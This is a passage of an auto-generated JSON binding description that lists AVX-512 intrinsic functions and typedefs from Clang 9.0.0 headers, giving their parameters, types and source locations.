"name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9420:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9426:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9438:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9458:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9474:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9495:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9500:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9505:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9510:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9522:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9528:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9548:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9553:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9558:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9568:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9574:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9580:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9604:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9609:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9614:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9620:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_reduce_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_reduce_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9645:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9650:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_mask_reduce_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:9656:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__v2hi", "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:20:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4qi", "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:21:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v2qi", "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:22:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_mm256_mask_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:227:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:243:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:251:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:259:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:267:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:275:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:299:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:307:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:323:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:331:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:339:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:347:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:355:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:363:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:379:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:387:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:403:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:411:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:427:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:435:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:443:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:451:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:457:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:465:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:471:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:477:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:497:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": 